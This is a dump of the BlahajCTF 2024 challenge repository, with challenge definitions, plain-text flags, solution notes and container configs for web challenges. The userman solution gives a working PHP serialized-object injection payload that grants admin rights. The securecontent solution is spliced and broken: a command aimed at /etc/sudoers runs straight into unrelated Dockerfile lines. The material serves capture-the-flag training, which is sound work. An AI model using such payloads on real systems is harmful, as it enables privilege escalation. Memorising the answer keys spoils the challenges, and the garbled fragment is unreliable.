13 | 14 | files: 15 | - dist/app.py 16 | 17 | connection_info: nc hostname 8000 18 | 19 | state: visible 20 | version: "0.1" 21 | -------------------------------------------------------------------------------- /Challenges/Web/securecontent/solution.md: -------------------------------------------------------------------------------- 1 | # Solution 2 | 3 | Paste this command: 4 | `> /etc/sudoers 10 | USER 1001 11 | CMD [ "./main.py" ] 12 | EXPOSE 8000 -------------------------------------------------------------------------------- /Challenges/Web/shark-lotto/requirements.txt: -------------------------------------------------------------------------------- 1 | Flask==2.0.1 2 | waitress==2.1.2 3 | Werkzeug==2.2.2 -------------------------------------------------------------------------------- /Challenges/Web/shark-lotto/static/blahaj.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/shark-lotto/static/blahaj.jpg -------------------------------------------------------------------------------- /Challenges/Web/shark-lotto/static/djungelskog.avif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/shark-lotto/static/djungelskog.avif -------------------------------------------------------------------------------- /Challenges/Web/shark-lotto/static/ikea.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/shark-lotto/static/ikea.png -------------------------------------------------------------------------------- /Challenges/Web/shark-lotto/static/neon-cat-cute.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Web/shark-lotto/static/neon-cat-cute.gif -------------------------------------------------------------------------------- /Challenges/Web/userman/challenge.yml: -------------------------------------------------------------------------------- 1 | name: User Management System 2 | author: fern 3 | category: web 4 | description: BlahajCorp just released a new User Management System to manage its employees across different divisions! Can you hack it and turn yourself into the admin? 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{d1Dnt_kN0w_pHP_C0u1D_0V3rf10W} 13 | 14 | files: 15 | - dist/chal.php 16 | 17 | connection_info: nc hostname 8000 18 | 19 | state: visible 20 | version: "0.1" 21 | -------------------------------------------------------------------------------- /Challenges/Web/userman/solution.md: -------------------------------------------------------------------------------- 1 | # Solution 2 | 3 | This is a PHP overflow challenge. Read [https://blog.hacktivesecurity.com/index.php/2019/10/03/rusty-joomla-rce/](https://blog.hacktivesecurity.com/index.php/2019/10/03/rusty-joomla-rce/) 4 | 5 | Solve: 6 | 1. Create account, set username to `\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0` and password to `ab";s:12:"\0\0\0_password";s:3:"abc";s:9:"\0\0\0_admin";b:1;s:12:"\0\0\0_reserved";s:47:"` 7 | 2. Log in with username `\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0` and password `abc` 8 | 9 | Flag: `blahaj{d1Dnt_kN0w_pHP_C0u1D_0V3rf10W}` -------------------------------------------------------------------------------- /Challenges/Web/userman/src/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM php:8.2-apache 2 | COPY src/ /var/www/html/ 3 | #COPY src/000-default.conf /etc/apache2/000-default.conf 4 | COPY src/000-default.conf /etc/apache2/sites-available/000-default.conf 5 | COPY src/ports.conf /etc/apache2/ports.conf 6 | RUN mkdir /var/www/html/databases 7 | RUN chmod 777 /var/www/html/databases 8 | EXPOSE 8000 9 | CMD ["apache2-foreground"] -------------------------------------------------------------------------------- /Challenges/Web/userman/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | userman: 3 | privileged: false 4 | build: . 5 | ports: 6 | - "8000:8000" 7 | -------------------------------------------------------------------------------- /Challenges/Web/userman/src/src/.htaccess: -------------------------------------------------------------------------------- 1 | DirectoryIndex index.php -------------------------------------------------------------------------------- /Challenges/Web/userman/src/src/ports.conf: -------------------------------------------------------------------------------- 1 | 2 | Listen 8000 3 | 4 | 5 | Listen 443 6 | 7 | 8 | 9 | Listen 443 10 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # blahajctf24 2 | BlahajCTF Challenge repository 2024 3 | --------------------------------------------------------------------------------